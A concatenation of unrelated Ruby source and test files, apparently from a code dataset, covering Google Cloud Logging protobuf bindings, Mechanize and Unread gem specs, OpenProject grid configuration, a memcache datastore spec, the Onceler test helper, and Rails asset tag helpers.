add_message "google.logging.v2.TailLogEntriesResponse" do
repeated :entries, :message, 1, "google.logging.v2.LogEntry"
repeated :suppression_info, :message, 2, "google.logging.v2.TailLogEntriesResponse.SuppressionInfo"
end
add_message "google.logging.v2.TailLogEntriesResponse.SuppressionInfo" do
optional :reason, :enum, 1, "google.logging.v2.TailLogEntriesResponse.SuppressionInfo.Reason"
optional :suppressed_count, :int32, 2
end
add_enum "google.logging.v2.TailLogEntriesResponse.SuppressionInfo.Reason" do
value :REASON_UNSPECIFIED, 0
value :RATE_LIMIT, 1
value :NOT_CONSUMED, 2
end
end
end
module Google
module Cloud
module Logging
module V2
DeleteLogRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.DeleteLogRequest").msgclass
WriteLogEntriesRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.WriteLogEntriesRequest").msgclass
WriteLogEntriesResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.WriteLogEntriesResponse").msgclass
WriteLogEntriesPartialErrors = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.WriteLogEntriesPartialErrors").msgclass
ListLogEntriesRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.ListLogEntriesRequest").msgclass
ListLogEntriesResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.ListLogEntriesResponse").msgclass
ListMonitoredResourceDescriptorsRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.ListMonitoredResourceDescriptorsRequest").msgclass
ListMonitoredResourceDescriptorsResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.ListMonitoredResourceDescriptorsResponse").msgclass
ListLogsRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.ListLogsRequest").msgclass
ListLogsResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.ListLogsResponse").msgclass
TailLogEntriesRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.TailLogEntriesRequest").msgclass
TailLogEntriesResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.TailLogEntriesResponse").msgclass
TailLogEntriesResponse::SuppressionInfo = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.TailLogEntriesResponse.SuppressionInfo").msgclass
TailLogEntriesResponse::SuppressionInfo::Reason = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.logging.v2.TailLogEntriesResponse.SuppressionInfo.Reason").enummodule
end
end
end
end
| 52.564815 | 192 | 0.759732 |
4aeb103504c563a92bae1e07bffac54ef742a8d7 | 6,737 | require 'mechanize/test_case'
class TestMechanizePage < Mechanize::TestCase
def setup
super
@uri = URI 'http://example/'
end
def test_selector_methods
page = html_page <<-BODY
<html>
<meta>
<head><title></title>
<body>
<span class="name" id="out">Eamonn</span>
<span>/</span>
<span class="name" id="bloody">Esther</span>
<span>/</span>
<span class="name" id="rageous">Fletcher</span>
</body>
</html>
BODY
# at(css_selector), % css_selector
assert_equal('Eamonn', page.at('#out').text)
assert_equal('Eamonn', (page % '#out').text)
# at(xpath_selector), % xpath_selector
assert_equal('Esther', page.at('//span[@id="bloody"]').text)
assert_equal('Esther', (page % '//span[@id="bloody"]').text)
# at_css()
assert_equal('Eamonn', page.at_css('#out').text)
# css()
assert_equal('Fletcher', page.css('.name')[2].text)
# at_xpath()
assert_equal('Esther', page.at_xpath('//span[@id="bloody"]').text)
# xpath()
assert_equal('Fletcher', page.xpath('//*[@class="name"]')[2].text)
end
def test_initialize_good_content_type
page = Mechanize::Page.new
assert_equal('text/html', page.content_type)
[
'text/html',
'Text/HTML',
'text/html; charset=UTF-8',
'text/html ; charset=US-ASCII',
'application/xhtml+xml',
'Application/XHTML+XML',
'application/xhtml+xml; charset=UTF-8',
'application/xhtml+xml ; charset=US-ASCII',
].each { |content_type|
page = Mechanize::Page.new(URI('http://example/'),
{ 'content-type' => content_type }, 'hello', '200')
assert_equal(content_type, page.content_type, content_type)
}
end
def test_initialize_bad_content_type
[
'text/xml',
'text/xhtml',
'text/htmlfu',
'footext/html',
'application/xhtml+xmlfu',
'fooapplication/xhtml+xml',
].each { |content_type|
page = Mechanize::Page.new(URI('http://example/'),
{ 'content-type' => content_type }, 'hello', '200')
assert_equal(content_type, page.content_type, content_type)
}
end
def test_frames
page = html_page <<-BODY
<TITLE>A simple frameset document</TITLE>
<FRAMESET cols="20%, 80%">
<FRAMESET rows="100, 200">
<FRAME name="frame1" src="/google.html">
<FRAME name="frame2" src="/form_test.html">
</FRAMESET>
<FRAMESET rows="100, 200">
<FRAME name="frame3" src="/file_upload.html">
<IFRAME src="http://google.com/" name="frame4"></IFRAME>
</FRAMESET>
</FRAMESET>
BODY
assert_equal 3, page.frames.size
assert_equal "frame1", page.frames[0].name
assert_equal "/google.html", page.frames[0].src
assert_equal "Google", page.frames[0].content.title
assert_equal "frame2", page.frames[1].name
assert_equal "/form_test.html", page.frames[1].src
assert_equal "Page Title", page.frames[1].content.title
assert_equal "frame3", page.frames[2].name
assert_equal "/file_upload.html", page.frames[2].src
assert_equal "File Upload Form", page.frames[2].content.title
assert_equal %w[/google.html /file_upload.html], page.frames_with(search: '*[name=frame1], *[name=frame3]').map(&:src)
end
def test_iframes
page = html_page <<-BODY
<TITLE>A simple frameset document</TITLE>
<FRAME name="frame1" src="/google.html">
<IFRAME src="/file_upload.html" name="frame4">
</IFRAME>
BODY
assert_equal 1, page.iframes.size
assert_equal "frame4", page.iframes.first.name
assert_equal "/file_upload.html", page.iframes.first.src
assert_equal "File Upload Form", page.iframes.first.content.title
end unless RUBY_ENGINE == 'jruby' # NekoHTML does not parse IFRAME
def test_image_with
page = html_page <<-BODY
<img src="a.jpg">
<img src="b.jpg">
<img src="c.png">
BODY
assert_equal "http://example/b.jpg",
page.image_with(:src => 'b.jpg').url.to_s
end
def test_images_with
page = html_page <<-BODY
<img src="a.jpg">
<img src="b.jpg">
<img src="c.png">
BODY
images = page.images_with(:src => /jpg\Z/).map { |img| img.url.to_s }
assert_equal %w[http://example/a.jpg http://example/b.jpg], images
end
def test_links
page = html_page <<-BODY
<a href="foo.html">
BODY
assert_equal page.links.first.href, "foo.html"
end
def test_parser_no_attributes
page = html_page <<-BODY
<html>
<meta>
<head><title></title>
<body>
<a>Hello</a>
<a><img /></a>
<form>
<input />
<select>
<option />
</select>
<textarea></textarea>
</form>
<frame></frame>
</body>
</html>
BODY
# HACK weak assertion
assert_kind_of Nokogiri::HTML::Document, page.root
end
def test_search_links
page = html_page <<-BODY
<html>
<meta>
<head><title></title>
<body>
<span id="spany">
<a href="b.html">b</a>
<a href="a.html">a</a>
</span>
<a href="6.html">6</a>
</body>
</html>
BODY
links = page.links_with(:search => "#spany a")
assert_equal 2, links.size
assert_equal "b.html", links[0].href
assert_equal "b", links[0].text
assert_equal "a.html", links[1].href
assert_equal "a", links[1].text
end
def test_search_images
page = html_page <<-BODY
<html>
<meta>
<head><title></title>
<body>
<img src="1.jpg" class="unpretty">
<img src="a.jpg" class="pretty">
<img src="b.jpg">
<img src="c.png" class="pretty">
</body>
</html>
BODY
{
:search => "//img[@class='pretty']",
:xpath => "//img[@class='pretty']",
:css => "img.pretty",
:class => "pretty",
:dom_class => "pretty",
}.each { |key, expr|
images = page.images_with(key => expr)
message = "selecting with #{key.inspect}"
assert_equal 2, images.size
assert_equal "pretty", images[0].dom_class, message
assert_equal "a.jpg", images[0].src, message
assert_equal "pretty", images[1].dom_class, message
assert_equal "c.png", images[1].src, message
}
end
def test_search_bad_selectors
page = html_page <<-BODY
<a href="foo.html">foo</a>
<img src="foo.jpg" />
BODY
assert_empty page.images_with(:search => '//a')
assert_empty page.links_with(:search => '//img')
end
def test_multiple_titles
page = html_page <<-BODY
<!doctype html>
<html>
<head>
<title>HTML>TITLE</title>
</head>
<body>
<svg>
<title>SVGTITLE</title>
<metadata id="metadata5">
<rdf:RDF>
<cc:Work>
<dc:title>RDFDCTITLE</dc:title>
</cc:Work>
</rdf:RDF>
</metadata>
<g></g>
</svg>
</body>
</html>
BODY
assert_equal page.title, "HTML>TITLE"
end
end
| 23.975089 | 122 | 0.61229 |
033db15b074d95fa648658993f869eef16175f3c | 4,748 | require 'spec_helper'
describe Unread::Reader do
before :each do
@reader = Reader.create! :name => 'David'
@other_reader = Reader.create :name => 'Matz'
wait
@email1 = Email.create!
wait
@email2 = Email.create!
end
describe :have_not_read do
it "should return all readers that have not read a given object" do
expect(Reader.have_not_read(@email1)).to eq [@reader, @other_reader]
expect(Reader.have_not_read(@email2)).to eq [@reader, @other_reader]
end
it "should return *only* the readers that have not read a given object" do
@email1.mark_as_read! :for => @reader
expect(Reader.have_not_read(@email1)).to eq [@other_reader]
expect(Reader.have_not_read(@email1).count).to eq 1
expect(Reader.have_not_read(@email2)).to eq [@reader, @other_reader]
end
it "should not allow invalid parameter" do
[ 42, nil, 'foo', :foo, {} ].each do |not_a_readable|
expect {
Reader.have_not_read(not_a_readable)
}.to raise_error(ArgumentError)
end
end
it "should not allow unsaved readable" do
unsaved_readable = Email.new
expect {
Reader.have_not_read(unsaved_readable)
}.to raise_error(ArgumentError)
end
end
describe :have_read do
it "should return an empty array" do
expect(Reader.have_read(@email1)).to be_empty
expect(Reader.have_read(@email2)).to be_empty
end
it "should return *only* the readers that have read the given object" do
@email1.mark_as_read! :for => @reader
expect(Reader.have_read(@email1)).to eq [@reader]
expect(Reader.have_read(@email1).count).to eq 1
expect(Reader.have_read(@email2)).to be_empty
end
it "should return the reader for all the object when all read" do
Email.mark_as_read! :all, :for => @reader
expect(Reader.have_read(@email1)).to eq [@reader]
expect(Reader.have_read(@email1).count).to eq 1
expect(Reader.have_read(@email2)).to eq [@reader]
expect(Reader.have_read(@email2).count).to eq 1
end
it "should not allow invalid parameter" do
[ 42, nil, 'foo', :foo, {} ].each do |not_a_readable|
expect {
Reader.have_read(not_a_readable)
}.to raise_error(ArgumentError)
end
end
it "should not allow unsaved readable" do
unsaved_readable = Email.new
expect {
Reader.have_read(unsaved_readable)
}.to raise_error(ArgumentError)
end
end
describe :with_read_marks_for do
it "should return readers" do
expect(Reader.with_read_marks_for(@email1).to_a).to eq([@reader, @other_reader])
end
it "should have elements that respond to :read_mark_id" do
all_respond_to_read_mark_id = Reader.with_read_marks_for(@email1).to_a.all? do |reader|
reader.respond_to?(:read_mark_id)
end
expect(all_respond_to_read_mark_id).to be_truthy
end
it "should be countable" do
expect(Reader.with_read_marks_for(@email1).count(:number)).to eq(2)
end
it "should not allow invalid parameter" do
[ 42, nil, 'foo', :foo, {} ].each do |not_a_readable|
expect {
Reader.with_read_marks_for(not_a_readable)
}.to raise_error(ArgumentError)
end
end
it "should not allow unsaved readable" do
unsaved_readable = Email.new
expect {
Reader.with_read_marks_for(unsaved_readable)
}.to raise_error(ArgumentError)
end
end
describe :have_read? do
it "should recognize read objects" do
expect(@reader.have_read?(@email1)).to be_falsey
expect(@reader.have_read?(@email2)).to be_falsey
end
it "should handle updating object" do
@email1.mark_as_read! :for => @reader
wait
expect(@reader.have_read?(@email1)).to be_truthy
@email1.update_attributes! :subject => 'changed'
expect(@reader.have_read?(@email1)).to be_falsey
end
it "should raise error for invalid argument" do
expect {
@reader.have_read?(42)
}.to raise_error(ArgumentError)
end
it "should work with eager-loaded read marks" do
@email1.mark_as_read! :for => @reader
expect {
readers = Reader.with_read_marks_for(@email1).to_a
expect(readers[0].have_read?(@email1)).to be_truthy
expect(readers[1].have_read?(@email1)).to be_falsey
}.to perform_queries(1)
end
it "should work with eager-loaded read marks for the correct readable" do
@email1.mark_as_read! :for => @reader
readers = Reader.with_read_marks_for(@email1).to_a
expect(readers[0].have_read?(@email1)).to be_truthy
expect(readers[0].have_read?(@email2)).to be_falsey
end
end
end | 29.490683 | 93 | 0.661752 |
012b611f86e83bc9e17c4f5f005abdacdb042379 | 721 | # frozen_string_literal: true
module HTTP
module Features
class AutoInflate < Feature
def wrap_response(response)
return response unless %w[deflate gzip x-gzip].include?(response.headers[:content_encoding])
Response.new(
:status => response.status,
:version => response.version,
:headers => response.headers,
:proxy_headers => response.proxy_headers,
:connection => response.connection,
:body => stream_for(response.connection)
)
end
def stream_for(connection)
Response::Body.new(Response::Inflater.new(connection))
end
HTTP::Options.register_feature(:auto_inflate, self)
end
end
end
| 27.730769 | 100 | 0.644938 |
6a1ed85ee0ced7fb4ba9d60daaeedac5eb413a06 | 3,299 | module Grids::Configuration
class InProjectBaseRegistration < ::Grids::Configuration::Registration
widgets 'work_packages_table',
'work_packages_graph',
'project_description',
'project_details',
'subprojects',
'work_packages_calendar',
'work_packages_overview',
'time_entries_project',
'members',
'news',
'documents',
'custom_text'
remove_query_lambda = -> {
::Query.find_by(id: options[:queryId])&.destroy
}
save_or_manage_queries_lambda = ->(user, project) {
user.allowed_to?(:save_queries, project) &&
user.allowed_to?(:manage_public_queries, project)
}
queries_permission_and_ee_lambda = ->(user, project) {
save_or_manage_queries_lambda.call(user, project) &&
EnterpriseToken.allows_to?(:grid_widget_wp_graph)
}
view_work_packages_lambda = ->(user, project) {
user.allowed_to?(:view_work_packages, project)
}
widget_strategy 'work_packages_table' do
after_destroy remove_query_lambda
allowed save_or_manage_queries_lambda
options_representer '::API::V3::Grids::Widgets::QueryOptionsRepresenter'
end
widget_strategy 'work_packages_graph' do
after_destroy remove_query_lambda
allowed queries_permission_and_ee_lambda
options_representer '::API::V3::Grids::Widgets::ChartOptionsRepresenter'
end
widget_strategy 'custom_text' do
options_representer '::API::V3::Grids::Widgets::CustomTextOptionsRepresenter'
end
widget_strategy 'work_packages_overview' do
allowed view_work_packages_lambda
end
widget_strategy 'work_packages_calendar' do
allowed view_work_packages_lambda
end
widget_strategy 'members' do
allowed ->(user, project) {
user.allowed_to?(:view_members, project)
}
end
widget_strategy 'news' do
allowed ->(user, project) {
user.allowed_to?(:view_news, project)
}
end
widget_strategy 'documents' do
allowed ->(user, project) {
user.allowed_to?(:view_documents, project)
}
end
macroed_getter_setter :view_permission
macroed_getter_setter :edit_permission
macroed_getter_setter :in_project_scope_path
class << self
def all_scopes
view_allowed = Project.allowed_to(User.current, view_permission)
projects = Project.where(id: view_allowed)
projects.map { |p| url_helpers.send(to_scope, p) }
end
def from_scope(scope)
# recognize_routes does not work with engine paths
path = [OpenProject::Configuration.rails_relative_url_root,
'projects',
'([^/]+)',
in_project_scope_path,
'?'].flatten.compact.join('/')
match = Regexp.new(path).match(scope)
return if match.nil?
{
class: grid_class.constantize,
project_id: match[1]
}
end
def writable?(grid, user)
super && user.allowed_to?(edit_permission, grid.project)
end
def visible(user = User.current)
super
.where(project_id: Project.allowed_to(user, view_permission))
end
end
end
end
| 27.264463 | 83 | 0.644135 |
39fafa4d2697332d5756e4c14ee075ab9ac017f7 | 164 | module TulOhist::Models
class Av < ActiveFedora::Base
has_metadata name: "base", label: "Base metadata", type: TulOhist::Datastreams::BaseDatastream
end
end | 32.8 | 98 | 0.75 |
619780e346c82161836b1fdccbd8957dc8473b6f | 3,826 | require 'spec_helper'
require 'excursion/datastores/memcache'
describe 'Excursion::Datastores::Memcache' do
def dummy_pool
Excursion::Specs::DUMMY_MEMCACHE_SERVER
end
def fill_pool
dc = Dalli::Client.new dummy_pool, {namespace: 'excursion'}
dc.flush_all
Excursion::Specs::Mocks::SIMPLE_VALUES.each do |key,val|
dc.set(key,val)
end
dc.set(Excursion::Datastores::Memcache::REGISTERED_KEYS, Excursion::Specs::Mocks::SIMPLE_VALUES.keys.map(&:to_s).join(','))
end
subject do
fill_pool
Excursion::Datastores::Memcache.new dummy_pool
end
describe '::new' do
it 'should require a server' do
expect { Excursion::Datastores::Memcache.new }.to raise_exception(ArgumentError)
expect { Excursion::Datastores::Memcache.new nil }.to raise_exception(Excursion::MemcacheConfigurationError)
expect { Excursion::Datastores::Memcache.new dummy_pool }.to_not raise_exception
end
end
describe '#read' do
describe 'key' do
it 'should be required' do
expect { subject.read }.to raise_exception
expect { subject.read('test_key') }.to_not raise_exception
end
it 'should accept a symbol or string' do
expect { subject.read('test_key') }.to_not raise_exception
expect { subject.read(:test_key) }.to_not raise_exception
end
it 'should convert symbols to strings' do
expect(subject.read(:key1)).to eql(subject.read('key1'))
end
end
context 'when the requested key does not exist' do
it 'should return nil' do
subject.read('non_existent_key').should be_nil
end
end
context 'when the requested key exists' do
it 'should return the value of the requested key' do
Excursion::Specs::Mocks::SIMPLE_VALUES.each do |key,val|
expect(subject.read(key)).to eql(val)
end
end
end
end
describe '#write' do
describe 'key' do
it 'should be required' do
expect { subject.write }.to raise_exception
end
it 'should accept a symbol or string' do
expect { subject.write('str_key', 'strval') }.to_not raise_exception
expect { subject.write(:sym_key, 'symval') }.to_not raise_exception
end
it 'should convert symbols to strings' do
subject.write(:sym_key, 'symval')
subject.read('sym_key').should == 'symval'
end
end
describe 'value' do
it 'should be required' do
expect { subject.write('test_key') }.to raise_exception(ArgumentError)
end
end
it 'should add the key to the datastore and set the value' do
subject.write('test_key', 'testval')
subject.read('test_key').should == 'testval'
end
it 'should return the value of the added key' do
subject.write('test_key', 'testval').should == 'testval'
end
end
describe '#delete' do
describe 'key' do
it 'should be required' do
expect { subject.delete }.to raise_exception(ArgumentError)
end
end
context 'when the key exists' do
it 'should remove the key from the datastore' do
subject.read('key1').should_not eql(nil)
subject.delete('key1')
subject.read('key1').should be(nil)
end
it 'should return the value of the deleted key' do
keyval = subject.read('key1')
subject.delete('key1').should eql(keyval)
end
end
context 'when the key does not exist' do
it 'should return nil' do
subject.delete('non_existent_key').should eql(nil)
end
end
end
describe '#all' do
it 'should return a hash of all the registered keys and their values' do
Excursion::Specs::Mocks::SIMPLE_VALUES.each do |k,v|
expect(subject.all[k.to_sym]).to eql(v)
end
end
end
end
| 28.552239 | 127 | 0.650549 |
913f979158a91fe4ff6511645913e6d523a6b74e | 148 | class AddPasswordResetSentAtToUsers < ActiveRecord::Migration[4.2]
def change
add_column :users, :password_reset_sent_at, :datetime
end
end
| 24.666667 | 66 | 0.790541 |
08e7436b9834895d9a1a2292c1cfb6ca56b9deb0 | 4,972 | require "set"
module Onceler
module Recordable
def self.extended(instance)
instance.instance_eval do
@__retvals = {}
@__inherited_retvals = {}
@__ignore_ivars = instance_variables
end
end
def __prepare_recording(recording)
method = recording.name
define_singleton_method(method) do
if @__retvals.key?(method)
@__retvals[method]
else
@__retvals[method] = __record(recording)
end
end
end
def __record(recording)
instance_eval(&recording.block)
end
def __retvals(inherit = false)
retvals = @__inherited_retvals.merge(@__retvals)
retvals.inject({}) do |hash, (key, val)|
hash[key] = val if __mutated?(key, val) || inherit
hash
end
end
def __ivars(inherit = false)
ivars = instance_variables - @__ignore_ivars
ivars.inject({}) do |hash, key|
if key.to_s !~ /\A@__/
val = instance_variable_get(key)
hash[key] = val if __mutated?(key, val) || inherit
end
hash
end
end
# we don't include inherited stuff in __data, because we might need to
# interleave things from an intermediate before(:each) at run time
def __mutated?(key, val)
# top-level recorders don't inherit anything, so we always want to return true
return true unless @__inherited_cache
# need to do both types of comparison, i.e. it's the same object in
# memory (not reassigned), and nothing about it has been changed
return true unless @__inherited_values[key].equal?(val)
return true unless __values_equal?(@__inherited_cache[key], val)
false
end
def __values_equal?(obj1, obj2)
if ActiveRecord::Base === obj1 && ActiveRecord::Base === obj2
cache_key = [obj1, obj2]
return @__comparison_cache[cache_key] if @__comparison_cache.key?(cache_key)
# so as to avoid cycles while traversing AR associations
@__comparison_cache[cache_key] = true
@__comparison_cache[cache_key] = obj1.attributes == obj2.attributes &&
__associations_equal?(obj1, obj2)
else
obj1 == obj2
end
end
# if a nested once block updates an inherited object's associations,
# we want to know about it
def __associations_equal?(obj1, obj2)
cache1 = obj1.instance_variable_get(:@association_cache)
cache2 = obj2.instance_variable_get(:@association_cache)
cache1.size == cache2.size &&
cache1.all? { |k, v| cache2.key?(k) && __values_equal?(v.target, cache2[k].target) }
end
def __data(inherit = false)
@__data ||= {}
@__data[inherit] ||= begin
@__comparison_cache = {}
data = [__ivars(inherit), __retvals(inherit)]
begin
data = Marshal.dump(data)
rescue TypeError
data.each do |hash|
hash.each do |key, val|
find_dump_error(key, val)
end
end
raise # find_dump_error should have re-raised, but just in case...
ensure
__visited_dump_vars.clear
end
@__comparison_cache = nil
data
end
end
def __visited_dump_vars
@__visited_dump_vars ||= Set.new
end
def find_dump_error(key, val, prefix = "")
return if __visited_dump_vars.include?(val)
__visited_dump_vars << val
Marshal.dump(val)
rescue TypeError
# see if anything inside val can't be dumped...
sub_prefix = "#{prefix}#{key} (#<#{val.class}>) => "
if val.respond_to?(:marshal_dump)
find_dump_error("marshal_dump", val.marshal_dump, sub_prefix)
else
# instance var?
val.instance_variables.each do |k|
v = val.instance_variable_get(k)
find_dump_error(k, v, sub_prefix)
end
# hash key/value?
val.each_pair do |k, v|
find_dump_error("hash key #{k}", k, sub_prefix)
find_dump_error("[#{k.inspect}]", v, sub_prefix)
end if val.respond_to?(:each_pair)
# array element?
val.each_with_index do |v, i|
find_dump_error("[#{i}]", v, sub_prefix)
end if val.respond_to?(:each_with_index)
end
# guess it's val proper
raise TypeError.new("Unable to dump #{prefix}#{key} (#<#{val.class}>) in #{self.class.metadata[:location]}: #{$!}")
end
def copy_from(other)
# need two copies of things for __mutated? checks (see above)
@__inherited_cache = Marshal.load(other.__data(:inherit)).inject(&:merge)
ivars, retvals = Marshal.load(other.__data(:inherit))
@__inherited_retvals = retvals
@__inherited_values = ivars.merge(retvals)
ivars.each do |key, value|
instance_variable_set(key, value)
end
retvals.each do |key, value|
define_singleton_method(key) { value }
end
end
end
end
| 31.468354 | 121 | 0.615044 |
03344db8d2d14cc55c8f3e76af2cabe89e694840 | 26,795 | # frozen_string_literal: true
require "active_support/core_ext/array/extract_options"
require "active_support/core_ext/hash/keys"
require "active_support/core_ext/object/inclusion"
require "action_view/helpers/asset_url_helper"
require "action_view/helpers/tag_helper"
module ActionView
# = Action View Asset Tag Helpers
module Helpers #:nodoc:
# This module provides methods for generating HTML that links views to assets such
# as images, JavaScripts, stylesheets, and feeds. These methods do not verify
# the assets exist before linking to them:
#
# image_tag("rails.png")
# # => <img src="/assets/rails.png" />
# stylesheet_link_tag("application")
# # => <link href="/assets/application.css?body=1" rel="stylesheet" />
module AssetTagHelper
include AssetUrlHelper
include TagHelper
mattr_accessor :image_loading
mattr_accessor :image_decoding
mattr_accessor :preload_links_header
mattr_accessor :apply_stylesheet_media_default
# Returns an HTML script tag for each of the +sources+ provided.
#
# Sources may be paths to JavaScript files. Relative paths are assumed to be relative
# to <tt>assets/javascripts</tt>, full paths are assumed to be relative to the document
# root. Relative paths are idiomatic, use absolute paths only when needed.
#
# When passing paths, the ".js" extension is optional. If you do not want ".js"
# appended to the path <tt>extname: false</tt> can be set on the options.
#
# You can modify the HTML attributes of the script tag by passing a hash as the
# last argument.
#
# When the Asset Pipeline is enabled, you can pass the name of your manifest as
# source, and include other JavaScript or CoffeeScript files inside the manifest.
#
# If the server supports Early Hints header links for these assets will be
# automatically pushed.
#
# ==== Options
#
# When the last parameter is a hash you can add HTML attributes using that
# parameter. The following options are supported:
#
# * <tt>:extname</tt> - Append an extension to the generated URL unless the extension
# already exists. This only applies for relative URLs.
# * <tt>:protocol</tt> - Sets the protocol of the generated URL. This option only
# applies when a relative URL and +host+ options are provided.
# * <tt>:host</tt> - When a relative URL is provided the host is added to the
# that path.
# * <tt>:skip_pipeline</tt> - This option is used to bypass the asset pipeline
# when it is set to true.
# * <tt>:nonce</tt> - When set to true, adds an automatic nonce value if
# you have Content Security Policy enabled.
#
# ==== Examples
#
# javascript_include_tag "xmlhr"
# # => <script src="/assets/xmlhr.debug-1284139606.js"></script>
#
# javascript_include_tag "xmlhr", host: "localhost", protocol: "https"
# # => <script src="https://localhost/assets/xmlhr.debug-1284139606.js"></script>
#
# javascript_include_tag "template.jst", extname: false
# # => <script src="/assets/template.debug-1284139606.jst"></script>
#
# javascript_include_tag "xmlhr.js"
# # => <script src="/assets/xmlhr.debug-1284139606.js"></script>
#
# javascript_include_tag "common.javascript", "/elsewhere/cools"
# # => <script src="/assets/common.javascript.debug-1284139606.js"></script>
# # <script src="/elsewhere/cools.debug-1284139606.js"></script>
#
# javascript_include_tag "http://www.example.com/xmlhr"
# # => <script src="http://www.example.com/xmlhr"></script>
#
# javascript_include_tag "http://www.example.com/xmlhr.js"
# # => <script src="http://www.example.com/xmlhr.js"></script>
#
# javascript_include_tag "http://www.example.com/xmlhr.js", nonce: true
# # => <script src="http://www.example.com/xmlhr.js" nonce="..."></script>
def javascript_include_tag(*sources)
options = sources.extract_options!.stringify_keys
path_options = options.extract!("protocol", "extname", "host", "skip_pipeline").symbolize_keys
preload_links = []
nopush = options["nopush"].nil? ? true : options.delete("nopush")
crossorigin = options.delete("crossorigin")
crossorigin = "anonymous" if crossorigin == true
integrity = options["integrity"]
rel = options["type"] == "module" ? "modulepreload" : "preload"
sources_tags = sources.uniq.map { |source|
href = path_to_javascript(source, path_options)
if preload_links_header && !options["defer"]
preload_link = "<#{href}>; rel=#{rel}; as=script"
preload_link += "; crossorigin=#{crossorigin}" unless crossorigin.nil?
preload_link += "; integrity=#{integrity}" unless integrity.nil?
preload_link += "; nopush" if nopush
preload_links << preload_link
end
tag_options = {
"src" => href,
"crossorigin" => crossorigin
}.merge!(options)
if tag_options["nonce"] == true
tag_options["nonce"] = content_security_policy_nonce
end
content_tag("script", "", tag_options)
}.join("\n").html_safe
if preload_links_header
send_preload_links_header(preload_links)
end
sources_tags
end
# Returns a stylesheet link tag for the sources specified as arguments.
#
# When passing paths, the <tt>.css</tt> extension is optional.
# If you don't specify an extension, <tt>.css</tt> will be appended automatically.
# If you do not want <tt>.css</tt> appended to the path,
# set <tt>extname: false</tt> in the options.
# You can modify the link attributes by passing a hash as the last argument.
#
# If the server supports Early Hints header links for these assets will be
# automatically pushed.
#
# ==== Options
#
# * <tt>:extname</tt> - Append an extension to the generated URL unless the extension
# already exists. This only applies for relative URLs.
# * <tt>:protocol</tt> - Sets the protocol of the generated URL. This option only
# applies when a relative URL and +host+ options are provided.
# * <tt>:host</tt> - When a relative URL is provided the host is added to the
# that path.
# * <tt>:skip_pipeline</tt> - This option is used to bypass the asset pipeline
# when it is set to true.
#
# ==== Examples
#
# stylesheet_link_tag "style"
# # => <link href="/assets/style.css" rel="stylesheet" />
#
# stylesheet_link_tag "style.css"
# # => <link href="/assets/style.css" rel="stylesheet" />
#
# stylesheet_link_tag "http://www.example.com/style.css"
# # => <link href="http://www.example.com/style.css" rel="stylesheet" />
#
# stylesheet_link_tag "style.less", extname: false, skip_pipeline: true, rel: "stylesheet/less"
# # => <link href="/stylesheets/style.less" rel="stylesheet/less">
#
# stylesheet_link_tag "style", media: "all"
# # => <link href="/assets/style.css" media="all" rel="stylesheet" />
#
# stylesheet_link_tag "style", media: "print"
# # => <link href="/assets/style.css" media="print" rel="stylesheet" />
#
# stylesheet_link_tag "random.styles", "/css/stylish"
# # => <link href="/assets/random.styles" rel="stylesheet" />
# # <link href="/css/stylish.css" rel="stylesheet" />
def stylesheet_link_tag(*sources)
options = sources.extract_options!.stringify_keys
path_options = options.extract!("protocol", "extname", "host", "skip_pipeline").symbolize_keys
preload_links = []
crossorigin = options.delete("crossorigin")
crossorigin = "anonymous" if crossorigin == true
nopush = options["nopush"].nil? ? true : options.delete("nopush")
integrity = options["integrity"]
sources_tags = sources.uniq.map { |source|
href = path_to_stylesheet(source, path_options)
if preload_links_header
preload_link = "<#{href}>; rel=preload; as=style"
preload_link += "; crossorigin=#{crossorigin}" unless crossorigin.nil?
preload_link += "; integrity=#{integrity}" unless integrity.nil?
preload_link += "; nopush" if nopush
preload_links << preload_link
end
tag_options = {
"rel" => "stylesheet",
"crossorigin" => crossorigin,
"href" => href
}.merge!(options)
if apply_stylesheet_media_default && tag_options["media"].blank?
tag_options["media"] = "screen"
end
tag(:link, tag_options)
}.join("\n").html_safe
if preload_links_header
send_preload_links_header(preload_links)
end
sources_tags
end
# Returns a link tag that browsers and feed readers can use to auto-detect
# an RSS, Atom, or JSON feed. The +type+ can be <tt>:rss</tt> (default),
# <tt>:atom</tt>, or <tt>:json</tt>. Control the link options in url_for format
# using the +url_options+. You can modify the LINK tag itself in +tag_options+.
#
# ==== Options
#
# * <tt>:rel</tt> - Specify the relation of this link, defaults to "alternate"
# * <tt>:type</tt> - Override the auto-generated mime type
# * <tt>:title</tt> - Specify the title of the link, defaults to the +type+
#
# ==== Examples
#
# auto_discovery_link_tag
# # => <link rel="alternate" type="application/rss+xml" title="RSS" href="http://www.currenthost.com/controller/action" />
# auto_discovery_link_tag(:atom)
# # => <link rel="alternate" type="application/atom+xml" title="ATOM" href="http://www.currenthost.com/controller/action" />
# auto_discovery_link_tag(:json)
# # => <link rel="alternate" type="application/json" title="JSON" href="http://www.currenthost.com/controller/action" />
# auto_discovery_link_tag(:rss, {action: "feed"})
# # => <link rel="alternate" type="application/rss+xml" title="RSS" href="http://www.currenthost.com/controller/feed" />
# auto_discovery_link_tag(:rss, {action: "feed"}, {title: "My RSS"})
# # => <link rel="alternate" type="application/rss+xml" title="My RSS" href="http://www.currenthost.com/controller/feed" />
# auto_discovery_link_tag(:rss, {controller: "news", action: "feed"})
# # => <link rel="alternate" type="application/rss+xml" title="RSS" href="http://www.currenthost.com/news/feed" />
# auto_discovery_link_tag(:rss, "http://www.example.com/feed.rss", {title: "Example RSS"})
# # => <link rel="alternate" type="application/rss+xml" title="Example RSS" href="http://www.example.com/feed.rss" />
def auto_discovery_link_tag(type = :rss, url_options = {}, tag_options = {})
